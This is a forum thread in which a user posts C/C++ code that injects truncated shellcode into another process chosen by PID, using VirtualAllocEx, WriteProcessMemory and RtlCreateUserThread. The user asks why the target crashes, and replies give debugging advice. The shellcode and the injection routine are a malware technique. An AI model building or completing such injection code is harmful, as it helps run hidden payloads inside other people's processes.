
Thread: RtlCreateUserThread best practices

  1. #1


    Hi guys,
    I have a shellcode. I used VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
    The code is executed successfully, but then the process crashes with a 0xC0000005 exception.

    I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
    I also tried calling ExitThread.
    How do I avoid crashing the process?
    Thanks.
    Here is the code:
    Code:
    RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(ntdll, "RtlCreateUserThread");
    cin >> pid;

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

    // Payload bytes (truncated here) and their length. The allocation below uses the
    // same length rather than a separately hand-counted 508 for a 509-byte write.
    const char *hex = "\xe9\xff\x00\x00\x00\xe8\x1b\x01"
                      "\x00\x00\x77\x69\x6e\x69\x6e\x65"
                      "\x74\x2e\x64\x6c\x6c\x00\xe8\x1f"....
    DWORD sizeofHex = 509;

    // RWX so the remote thread can be started from this buffer.
    LPVOID code = VirtualAllocEx(hProc, NULL, sizeofHex, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, code, hex, sizeofHex, NULL);

    HANDLE hThd = NULL;
    CLIENT_ID cid;
    // The filter must evaluate to EXCEPTION_EXECUTE_HANDLER for the handler to run, and
    // it only guards this call in our own process: a fault in the target's new thread
    // (the 0xC0000005) is raised over there and cannot be caught here.
    __try {
        RtlCreateUserThread(hProc, NULL, FALSE, 0, 0, 0, code, NULL, &hThd, &cid);
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        return -1;
    }
    WaitForSingleObject(hThd, INFINITE);

    CloseHandle(hThd);
    CloseHandle(hProc);
    Last edited by capadleman; June 18th, 2013 at 12:59. Reason: added the source code
    I promise that I have read the FAQ and tried to use the Search to answer my question.

  2. #2
    We are glad to help you with your question.

    NeO

  3. #3
    Okay, I updated my question, Neo.

  4. #4
    Any code, maybe, so people can have a look at what you did wrong? I will be just a little sarcastic... I hope you will get the point of what I am saying.

    I have a BOOK. It uses VirtualAlloc with MEM_COMMIT and PAGE_EXECUTE_READWRITE, then RtlCreateUserThread.
    The code is executed successfully, but then the process crashes with a 0xC0000005 exception.

    I read about DEP, but I already used PAGE_EXECUTE_READWRITE!
    I also tried calling ExitThread.
    How to avoid crashing the process?... hmm, maybe by doing it right ;O

    I am not trying to be mean, I am just trying to help...

    bye, NeO

  5. #5
    No problem, I'm at work now,
    so I need to get home to post the code.

  6. #6
    RtlCreateUserThread() is a bad API to use here. Use kernel32, because you are in Win32 (not native). It makes no sense to mix the two.

  7. #7
    There's still a lot of missing information here, so let me probe a bit.
    First, you should know that DEP is also a mechanism that can be enforced at the hardware level when trying to execute shellcode on the stack, regardless of whether you're using VirtualAlloc or not.
    Also, I didn't get a chance to see exactly what the shellcode is doing, but have you suspended the target process before trying to execute the shellcode? I can see issues with the current code you're using that may cause some undefined behaviour, namely at the point at which the shellcode is being executed via the remote thread.
    Where is the shellcode being injected? Also, try adding a check to see if the call to VirtualAllocEx even succeeded; it would be a shame if it didn't, right?
